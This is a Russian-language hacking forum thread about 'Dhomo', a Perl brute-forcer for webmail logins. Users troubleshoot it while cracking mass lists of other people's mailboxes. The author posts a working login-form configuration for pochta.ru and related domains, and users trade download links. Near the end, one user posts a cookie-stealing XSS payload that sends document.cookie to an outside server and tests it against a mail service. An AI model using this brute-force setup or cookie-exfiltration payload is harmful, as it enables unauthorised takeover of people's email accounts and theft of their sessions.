Dhomo - скрипт для брута от меня

Discussion in 'Уязвимости Mail-сервисов' started by Digimortal, 5 Dec 2006.

  1. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    вот ответ на другом сервере
    тут perl 5.8.7 но опять проблемы с потоками вроде этого модуля нет
    выложи старую версию брута без многопоточности
    Code:
    perl /usr/local/www/uploads/dhomo.pl
    /usr/local/www/uploads/dhomo.pl line 4:
    
    This Perl hasn't been configured and built properly for the threads
    module to work.  (The 'useithreads' configuration option hasn't been used.)
    
    Having threads support requires all of Perl and all of the XS modules in
    the Perl installation to be rebuilt, it is not just a question of adding
    the threads module.  (In other words, threaded and non-threaded Perls
    are binary incompatible.)
    
    If you want to the use the threads module, please contact the people
    who built your Perl.
    
    Cannot continue, aborting.
    BEGIN failed--compilation aborted at /usr/local/lib/perl5/5.8.7/mach/threads.pm
    line 28.
    Compilation failed in require at /usr/local/www/uploads/dhomo.pl line 4.
    BEGIN failed--compilation aborted at /usr/local/www/uploads/dhomo.pl line 4.
    
     
  2. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    однопоточный заработал но теперь другая проблема
    не находит правильный пароль на хосте

    а на моем компе находит

    Starting bruteforce at Tue Mar 13 21:24:15 2007
    [email protected];parol
    Ending bruteforce at Tue Mar 13 21:24:29 2007
    Passwords founded: 1. Time remaining: 14 sec

    на хосте

    Starting bruteforce at Tue Mar 13 22:16:58 2007
    Ending bruteforce at Tue Mar 13 22:17:11 2007
    Passwords founded: 0. Time remaining: 13 sec

    наверное дедик придется покупать
     
  3. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    а я думаю что добавить прямой перебор именно цифр до 8 символов
    имеет смысл такой словарь весит около 1Gb и залить его
    проблематично а вот сбрутить вполне реально тем более что
    цифровые пароли встречаются довольно часто

    с брутом от genom та же фигня у себя работает на хостах нет
     
  4. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    >> такой словарь весит около 1Gb и залить его проблематично

    зачем заливать, когда можно его сгенерировать? (если место есть свободное, конечно)
    может позже сделаю такую функцию + брут по маске..

    >> с брутом от genom та же фигня у себя работает на хостах нет

    потому что проблема не в бруте, а в твоем хосте.. поищи другой..
     
  5. Murt@zaa

    Murt@zaa New Member

    Joined:
    27 Aug 2006
    Messages:
    18
    Likes Received:
    3
    Reputations:
    1
    Всем здорова! Вот проблема возникла: сначало сбрутился пароль для одного ящика, я заюзал его а почтовик пишет неверный пароль, ну думаю ладно, дальше у всех сбрученых ящиков такая же фигня. Но потом для ящиков стал выдавать по несколько паролей такие как: mailpassword, qwerty, passwd. Ну так подскажите в чем траблы? Может у меня руки кривые:)
     
  6. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    ты бы хоть написал какой домен/домены ты брутил.. словарь большой был? ошибки появлялись?
     
    #46 Digimortal, 17 Mar 2007
    Last edited: 17 Mar 2007
  7. MartinIg

    MartinIg New Member

    Joined:
    7 Mar 2007
    Messages:
    17
    Likes Received:
    2
    Reputations:
    0
    5 сайтов тестил, на 2х брут работал
     
  8. Murt@zaa

    Murt@zaa New Member

    Joined:
    27 Aug 2006
    Messages:
    18
    Likes Received:
    3
    Reputations:
    1
    2 Digimortal вот записи из лога:
    Файл с паролями содержит всего 12 записей, а вот с мэйлами весит 748 кб. Хотя щас поробую брутеру только несколько мэйлов скормить, может и получится нормально.
    Кстати ошибок ни каких не было, тьфу-тьфу:~)

    Вот оставил только два ящика, словарь с паролями такой же маленький:
    Причем ни один из этих паролей не подходит.
    Незнаю я уже че еще можно придумать:(.
     
    #48 Murt@zaa, 17 Mar 2007
    Last edited by a moderator: 17 Mar 2007
  9. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    Murt@zaa, тут проблема всего лишь в том, что на хотбоксе произошли некоторые изменения..
    а потому следует слекга подправить вторую строку в базе скрипта, чтоб все нормально работало:

    ['www.pochta.ru', 'reason=login&lng=ru&rnd=123456789&user=zlogin&domain=zdomain&pass=zpass&rememb=0', '/login.php', 'http://www6.pochta.ru/index.php?lng=ru', 350, 'Set-Cookie: id=', 'pochta.ru', 'fromru.com', 'pochtamt.ru', 'hotbox.ru', 'krovatka.net', 'rbcmail.ru', 'front.ru', 'pop3.ru', 'land.ru', 'smtp.ru', 'mail15.com', 'mail333.com', 'pisem.net']
     
    1 person likes this.
  10. Murt@zaa

    Murt@zaa New Member

    Joined:
    27 Aug 2006
    Messages:
    18
    Likes Received:
    3
    Reputations:
    1
    2 Digimortal большое спасибо все исправил, все работает как часы.
     
  11. Benzin

    Benzin Elder - Старейшина

    Joined:
    15 Jan 2007
    Messages:
    39
    Likes Received:
    8
    Reputations:
    -5
    Юзаю 0.32b, т.к. 0.5 не пашет, как сказал автор темы наверно не поддерживается многопоточность. Пробовал ломать свое мыло, тут все гуд, но когда ставлю небольшой словирк метров на 7, то по проишествии какого то времени выдается следующее, в чем дело, как исправить. Ящик на mail.ru

    Code:
    [>] Dhomo v.0.32 - the Simple email webinterface bruteforcer
    [>]       by Digimortal [http://digimortal.0x48k.cc]
    [>]
    [i] Loading base..
    [i] Starting bruteforce at Sat Jun  2 17:58:47 2007
    Can't use an undefined value as a symbol reference at dhomo-0.32b.pl line 74, <$                                 passwd> line 3128.
    
    
     
  12. mindw0rk

    mindw0rk Elder - Старейшина

    Joined:
    8 Jun 2007
    Messages:
    63
    Likes Received:
    50
    Reputations:
    1
    Digimortal, твой хостер умер. Дайте кто-нибудь зеркало, пожлст.
     
  13. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    http://slil.ru/24568172
     
    1 person likes this.
  14. kalpsik

    kalpsik Elder - Старейшина

    Joined:
    10 Jan 2007
    Messages:
    58
    Likes Received:
    18
    Reputations:
    0
    залейте плз кто-нить еще разок... винт погорел, скрипт потерялся=(
    -----------------------------------------------
    добавлено: простите криворукого, нашел сам=)
    http://slil.ru/24674272
     
    #54 kalpsik, 3 Sep 2007
    Last edited: 3 Sep 2007
  15. SeeJay

    SeeJay New Member

    Joined:
    21 Feb 2006
    Messages:
    18
    Likes Received:
    1
    Reputations:
    -1
    Залейте, пожалуйста кто-нить свежую dhomo.base!

    Заранее благодарен.
     
  16. SeeJay

    SeeJay New Member

    Joined:
    21 Feb 2006
    Messages:
    18
    Likes Received:
    1
    Reputations:
    -1
    http://slil.ru/24568172 - Файл не найден
    http://slil.ru/24674272 - Файл не найден
     
  17. Vallez

    Vallez Elder - Старейшина

    Joined:
    25 Dec 2005
    Messages:
    88
    Likes Received:
    19
    Reputations:
    -8
    Плз перезалейте последнюю версию брута.
     
  18. atta

    atta New Member

    Joined:
    3 Jul 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    здесь 0.5b
     
  19. dfanat

    dfanat New Member

    Joined:
    28 Aug 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Все еше актуально

    при отправке на мэйл
    PHP:
    <script>img = new Image(); img.src "http://vnikopole.ru/s/s.gif?cook='+document.cookie;</script>

    мэйл пишет в письме


    Code:
    ВНИМАНИЕ!  Данное письмо содержит потенциально опасный HTML-код, заблокированный системой безопасности.  Возможно, оно отображается неправильно.
     
  20. Akon

    Akon New Member

    Joined:
    28 Aug 2008
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Так на фреймы или на забаненные HTML'ки реагирует